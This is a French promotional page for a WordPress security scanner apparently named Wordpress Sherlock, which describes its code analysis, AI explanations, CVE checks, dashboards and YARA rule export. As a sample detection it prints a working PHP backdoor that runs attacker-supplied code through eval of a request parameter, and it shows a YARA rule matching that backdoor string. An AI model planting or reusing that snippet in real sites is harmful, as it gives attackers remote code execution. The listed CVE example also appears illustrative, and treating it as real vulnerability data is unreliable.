Un arsenal complet pour la sécurité de votre site
Wordpress Sherlock est bien plus qu'un simple scanner. C'est une plateforme d'analyse complète qui vous donne une visibilité totale sur l'intégrité de vos fichiers et la posture de sécurité de votre site WordPress. Découvrez comment nos outils vous aident à détecter, comprendre et éliminer les menaces.
Analyse en profondeur du code source
Notre scanner ne se contente pas de vérifier les signatures de malwares connues. Il plonge au cœur du code source de vos fichiers PHP et JavaScript, y compris les thèmes, les plugins et les fichiers uploadés. Il recherche activement les schémas de code suspects, les fonctions dangereuses comme `eval()`, `base64_decode` utilisées de manière suspecte, le code obfusqué et les techniques d'injection courantes. C'est cette analyse en profondeur qui nous permet de trouver des menaces que d'autres outils ignorent.
<?php
if(isset($_REQUEST['c'])) {
@eval(stripslashes($_REQUEST['c']));
exit();
}
?>Explications et remédiations par l'IA
Ne restez plus jamais seul face à une menace. Pour chaque fichier suspect, nous soumettons l'extrait de code pertinent à notre modèle d'IA entraîné pour la sécurité. Il analyse le code, vous explique en termes clairs le risque potentiel (ex: 'Ce code crée une porte dérobée qui permet d'exécuter des commandes à distance'), son niveau de criticité, et vous suggère des étapes de remédiation claires et actionnables.
Verdict
Ce code est une porte dérobée (backdoor). Il permet à un attaquant d'exécuter n'importe quel code PHP sur votre serveur via une simple requête web. C'est une menace de niveau critique.
Remédiation suggérée
Supprimez ce fichier immédiatement. Il n'appartient pas au cœur de WordPress ni à un plugin légitime. Vérifiez également les fichiers récemment modifiés sur votre serveur.
Vérification des vulnérabilités des dépendances
Un site WordPress est un écosystème complexe. Une seule dépendance obsolète peut être une porte d'entrée pour les attaquants. Notre scanner vérifie les versions de vos plugins et thèmes et les compare à des bases de données de vulnérabilités (CVEs) constamment mises à jour. Si une faille de sécurité connue est détectée, nous vous alertons immédiatement en vous indiquant la marche à suivre.
Ultimate Member
Version installée: 2.1.3
Vulnérabilité critique détectée (CVE-2023-12345)
Une faille de type "Unauthenticated Arbitrary File Upload" permet à un attaquant de téléverser des fichiers malveillants. Mettez à jour vers la version 2.1.4 ou supérieure immédiatement.
Rapports clairs et tableau de bord centralisé
Oubliez les logs interminables et incompréhensibles. Wordpress Sherlock synthétise les résultats dans un rapport visuel, avec des scores de risque, des graphiques et la liste claire des fichiers suspects. Depuis votre tableau de bord, gérez plusieurs sites, lancez des analyses et consultez l'historique de sécurité de chaque client ou projet personnel.
Tableau de bord
3 sites surveillésHistorique des scans
Chaque scan est sauvegardé. Suivez l'évolution de la sécurité de vos sites dans le temps, comparez les résultats avant et après une intervention, et gardez une trace de toutes les menaces détectées. Cette fonctionnalité est essentielle pour un suivi rigoureux et pour justifier vos interventions de maintenance auprès de vos clients.
Historique pour client-b.com
Génération de règles de détection YARA
Pour les experts en sécurité, les administrateurs système et les agences gérant de nombreux sites, notre outil offre une fonctionnalité unique : la génération de règles YARA. Basées sur les menaces spécifiques détectées sur votre site, ces règles peuvent être exportées et intégrées dans vos propres systèmes de surveillance (comme des IDS/IPS) pour une protection pro-active sur l'ensemble de votre parc de sites.
rule Suspicious_eval_Request {
strings:
$eval = "eval(stripslashes($_REQUEST['c']));"
condition:
$eval
}Prêt à reprendre le contrôle ?
Découvrez par vous-même la puissance de Wordpress Sherlock. Lancez une analyse gratuite et obtenez un diagnostic de sécurité complet en quelques minutes.